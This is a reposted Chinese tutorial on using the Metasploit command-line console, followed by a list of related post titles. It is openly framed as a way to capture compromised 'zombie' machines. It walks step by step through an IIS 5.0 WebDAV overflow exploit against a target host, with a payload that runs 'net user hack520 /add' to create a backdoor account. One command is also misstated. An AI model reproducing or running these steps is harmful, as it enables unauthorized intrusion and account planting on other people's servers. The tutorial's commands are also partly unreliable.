强大溢出工具包:Metasploit命令行下的使用 (转至77169)
来源:互联网 发布:淘宝买家信誉最多 编辑:程序博客网 时间:2024/04/29 08:37
Metasploit 是个好东西,实在想不到别的办法了,或许这东西能帮你一下,Metasploit包含了众多exploit,说不准还能用上几个,搞几台好肉鸡.
下载Metasploit双击进行安装,非常简单,一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我们看到的是metasploit的欢迎界面,输入“?”查看帮助,如图1
看到很多命令吧,我们来解释一下
“?” 帮助
“cd” :这个命令大家都熟悉,和WIN下面一样,切换目录
“exit” 这个就是退出的意思
“info”显示当前程序信息
“quit”退出程序
“reload”加载exploit和payloads
“save”保存设置
“setg”设置一个环境变量
“show”显示当前可用的exploit
“ use”选择一个exp
“version”显示程序版本
这么多命令看起来肯定有些晕了吧其实用到的就"show" "info" "use"这3个,我们来看看是怎么使用的
这个程序就是一个大的工具包,集成了N多EXPLOIT,我们可以用show exploits看看有哪些exploit程序,如图2
Return to Gallery | Original Image
看到了吧?这么多溢出程序,想用哪个就用哪个,省得整天找。这么多的东西该怎么用呢??比如我想用一个溢出程序,肯定得先看他的帮助了解使用方法。这就得用到info命令啦。这个命令就是显示溢出程序的详细信息,比如我们想看下iis50_webdav_ntdll这个溢出程序的用法,就在命令行下输入info exploit iis50_webdav_ntdll,就会看到图3所示
这里只是查看Exploit的信息,我们还可查看shellcode的信息。在这个工具包中,可以定义自己需要的shellcode.在命令行下输入"show payloads"可以看到可用的shellcode列表,如图4
左边是名字,右边是说明。我们可以用info命令查看shellcode的具体信息,输入命令info payload cmd_generic如图5所示
这里要注意的只是required和options,这里required表示必选 options 表示可选可不选,以linux开头的就是针对linux系统的shellcode,以CMD和WIN开头的就是针对所有WIN系统。在溢出过程中一定要选对应的SHELLCODE才能成功。
好,现在我们来看实战一下,我们拿webdav的溢出程序做例子,在命令中输入use iis50_webdav_ntdll,然后再输入show options 查看要输入的内容,如图6所示
然后我们在命令行下输入set rhost 192.168.1.223 set rhost 80 如图7所示
到这里了,得指定shellcode,输入以下命令:set payload winexec输完了按回车然后再输入set cmd net user hack520 /add 如图8所示
好了现在可以向192.168.1.223发起进攻了,输入show targets 可以看到操作系统的代号,大家都知道webdav走针对2000系统,输入 set targets 0 如图9所示
没有什么问题了就输入Exploit。如果对方服务器存在这个漏洞话就会得到shell了
http://www.metasploit.com/projects/Framework/downloads.html
- 强大溢出工具包:Metasploit命令行下的使用 (转至77169)
- 强大溢出工具包 Metasploit使用教程
- 溢出工具包 Metasploit使用教程
- windows下强大的wmic命令行工具
- kali 下metasploit (msf)初始化使用
- Ubuntu10.04下使用metasploit对win2000 server进行MS06-040溢出
- Ubuntu10.04下使用metasploit对win2000 server进行MS08-067溢出
- Ubuntu下Aircrack-ng工具包的使用
- Ubuntu下Aircrack-ng工具包的使用
- 强大的UNIX命令行
- 强大的UNIX命令行
- Metasploit的使用测试
- 命令行下强大的虚拟网络配置工具—vnetlib
- windows下比CMD更强大的命令行WMIC
- BT5下的metasploit更新
- Day2:初识Metasploit(下)
- 强大的命令行工具wmic
- 强大的命令行工具wmic
- 测试
- CSVToXML.jar CSV to XML的方法
- AERONET Data File Format Help
- VB.net 调用带参数存储过程
- 一个女大学生总结的大学生活
- 强大溢出工具包:Metasploit命令行下的使用 (转至77169)
- 模型终于建出来了
- EMule搜书技巧(经典原创!)
- 【毕业留念】我的FLASH经(4)——镜头 风格
- 【毕业留念】我的FLASH经(5)——写在最后
- 借助JBuilder开发多种关联的Entity Bean
- Sun Java Wireless Toolkit 2.3 beta新增功能(翻译)
- IBM Training -- Grid computing
- IBM Grid Toolbox